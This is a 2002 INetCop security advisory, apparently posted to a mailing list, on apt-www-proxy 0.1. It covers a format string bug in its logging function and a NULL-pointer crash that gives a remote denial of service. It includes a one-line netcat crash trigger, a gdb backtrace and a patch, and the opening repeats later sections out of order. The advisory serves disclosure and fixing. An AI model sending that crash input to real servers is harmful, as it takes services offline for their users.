apt-www-proxy is a proxy server designed specificly for apt-get
http:// repositories. It gathers files that clients request, and then
simultaneously retrieves, streams to client, and to local disk archive
based on a set of archive mappings a lot like apt-proxy does. I
decided to write this due to the unstable nature of apt-proxy. IMHO
this is due to it being written in shell script. It's a good design,
just was never implemented in the right kind of language.
Second, examine remote DoS vulnerability.
We read 'utils.c' code again.
__
260 int parse_get(struct client * client)
...
268 /* now match against the archives */
269 if(!strncmp("http://", client->get, 7)) // Here.
270 {
271 /* AHHA! It's a full URL. */
--
If 'client->get' value is NULL, strncmp() function segfault happens crash.
Program function execution structure is as following.
First, execute apt-www-proxy daemon.
Do debug in other shell thereafter.
#1) Test attacker:
bash$ (printf "\r\n";cat)|nc 0 6543
#2) Debugging:
Program received signal SIGSEGV, Segmentation fault.
strncmp (s1=0x804b730 "http://", s2=0x0, n=7)
at ../sysdeps/generic/strncmp.c:43
43 ../sysdeps/generic/strncmp.c: No such file or directory.
(gdb) bt
#0 strncmp (s1=0x804b730 "http://", s2=0x0, n=7)
at ../sysdeps/generic/strncmp.c:43
#1 0x804a9f3 in parse_get (client=0x80516c8) at utils.c:269
#2 0x804a176 in process_cli (reads={__fds_bits = {64, 0 <repeats 31 times>}},
writes={__fds_bits = {64, 0 <repeats 31 times>}}) at lists.c:270
#3 0x8049750 in main_loop (s=5) at apt-www-proxy.c:408
#4 0x8049b56 in main (argc=3, argv=0xbffffbe4,
arge=0xbffffbf4 ...) at apt-www-proxy.c:578
(gdb)
You can kill daemon through this.
Do you want exploit code? Very regrettable. :-(
We don't want to compose DoS code.
0x04. Patch
=== utils.patch ===
--- utils.c Mon Oct 22 15:20:29 2001
+++ utils.patch.c Sat Nov 30 02:26:35 2002
@@ -224,11 +224,11 @@
/* log that information */
if(background)
{
- syslog(level, message);
+ syslog(level, "%s", message);
}
else
{
- fprintf(stderr, message);
+ fprintf(stderr, "%s", message);
}
}
}
@@ -265,6 +265,10 @@
struct urlmask *curu = urls;
int found = 0;
+ if(client->get==NULL)
+ {
+ return(0);
+ }
/* now match against the archives */
if(!strncmp("http://", client->get, 7))
{
=== eof ===
P.S: Sorry, for my poor english.
--
By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.
========================================
INetCop Security Advisory #2002-0x82-009
========================================
* Title: Remote multiple vulnerability in apt-www-proxy.
0x01. Description
__
bash$ lynx -dump http://ironsides.terrabox.com/~ahzz/apt-www-proxy/
apt-www-proxy
apt-www-proxy is a proxy server designed specificly for apt-get
http:// repositories. It gathers files that clients request, and then
simultaneously retrieves, streams to client, and to local disk archive
based on a set of archive mappings a lot like apt-proxy does. I
decided to write this due to the unstable nature of apt-proxy. IMHO
this is due to it being written in shell script. It's a good design,
just was never implemented in the right kind of language.
[1]apt-www-proxy 0.1 - accepts clients and automaticly says "not
found". nifty eh? 8-P
And of course, who would be without the [2]latest snapshot!
Back to my [3]homepage!
References
1. http://ironsides.terrabox.com/~ahzz/apt-www-proxy/apt-www-proxy-0.1.tar.
gz
2. http://ironsides.terrabox.com/~ahzz/apt-www-proxy/latest-AWP.tar.bz2
3. http://ironsides.terrabox.com/~ahzz/index.html
bash$
--
OK, Let's analyze.
Examine syslog() function first.
There is awp_log() function to 173 lines of 'src/utils.c' code.
__
173 void awp_log(int level, const char *message)
...
222 if((level < LOG_DEBUG) || (1 == logit))
224 /* log that information */
227 syslog(level, message); // Here.
...
--
It's very bad state.
awp_log() function is used as follows.
Format string bug happens by setting file error log.
Let's find awp_log() function in 'apt-www-proxy.c' code.
__
47 awp_log(LOG_DATA, errlog);
78 awp_log(LOG_DATA, errlog);
93 awp_log(LOG_DATA, errlog);
130 awp_log(LOG_DATA, errlog);
146 awp_log(LOG_DATA, errlog);
157 awp_log(LOG_GEN, errlog);
287 awp_log(LOG_NOTICE, errlog);
500 awp_log(LOG_NOTICE,errlog);
510 awp_log(LOG_CRIT, errlog);
527 awp_log(LOG_ERR, errlog);
538 awp_log(LOG_INFO, errlog);
546 awp_log(LOG_NOTICE, errlog);
554 awp_log(LOG_NOTICE, errlog);
560 awp_log(LOG_NOTICE, errlog);
572 awp_log(LOG_NOTICE, errlog);
--
Second, examine remote DoS vulnerability.
We read 'utils.c' code again.
__
260 int parse_get(struct client * client)
...
268 /* now match against the archives */
269 if(!strncmp("http://", client->get, 7)) // Here.
270 {
271 /* AHHA! It's a full URL. */
--
If 'client->get' value is NULL, strncmp() function segfault happens crash.
Program function execution structure is as following.
----------------------------------------------------------------------
main()->main_loop()->process_cli()->parse_get()->strncmp()->'segfault'
----------------------------------------------------------------------
0x02. Vulnerable Packages
Vendor site: http://ironsides.terrabox.com/~ahzz/apt-www-proxy/
apt-www-proxy 0.1
-apt-www-proxy-0.1.tar.gz
+Linux
0x03. Exploit
Try simple test.
* Test -
First, execute apt-www-proxy daemon.
Do debug in other shell thereafter.
#1) Test attacker:
bash$ (printf "\r\n";cat)|nc 0 6543
#2) Debugging:
Program received signal SIGSEGV, Segmentation fault.
strncmp (s1=0x804b730 "http://", s2=0x0, n=7)
at ../sysdeps/generic/strncmp.c:43
43 ../sysdeps/generic/strncmp.c: No such file or directory.
(gdb) bt
#0 strncmp (s1=0x804b730 "http://", s2=0x0, n=7)
at ../sysdeps/generic/strncmp.c:43
#1 0x804a9f3 in parse_get (client=0x80516c8) at utils.c:269
#2 0x804a176 in process_cli (reads={__fds_bits = {64, 0 <repeats 31 times>}},
writes={__fds_bits = {64, 0 <repeats 31 times>}}) at lists.c:270
#3 0x8049750 in main_loop (s=5) at apt-www-proxy.c:408
#4 0x8049b56 in main (argc=3, argv=0xbffffbe4,
arge=0xbffffbf4 ...) at apt-www-proxy.c:578
(gdb)
You can kill daemon through this.
Do you want exploit code? Very regrettable. :-(
We don't want to compose DoS code.
0x04. Patch
=== utils.patch ===
--- utils.c Mon Oct 22 15:20:29 2001
+++ utils.patch.c Sat Nov 30 02:26:35 2002
@@ -224,11 +224,11 @@
/* log that information */
if(background)
{
- syslog(level, message);
+ syslog(level, "%s", message);
}
else
{
- fprintf(stderr, message);
+ fprintf(stderr, "%s", message);
}
}
}
@@ -265,6 +265,10 @@
struct urlmask *curu = urls;
int found = 0;
+ if(client->get==NULL)
+ {
+ return(0);
+ }
/* now match against the archives */
if(!strncmp("http://", client->get, 7))
{
=== eof ===
P.S: Sorry, for my poor english.
--
By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.
MSN & E-mail: szoahc(at)hotmail(dot)com,
xploit(at)hackermail(dot)com
INetCop Security Home: http://www.inetcop.org (Korean hacking game)
My World: http://x82.i21c.net
GPG public key: http://wizard.underattack.co.kr/~x82/h0me/pr0file/x82.k3y
--
--
_______________________________________________
Get your free email from http://www.hackermail.com
Powered by Outblaze
[ reply ]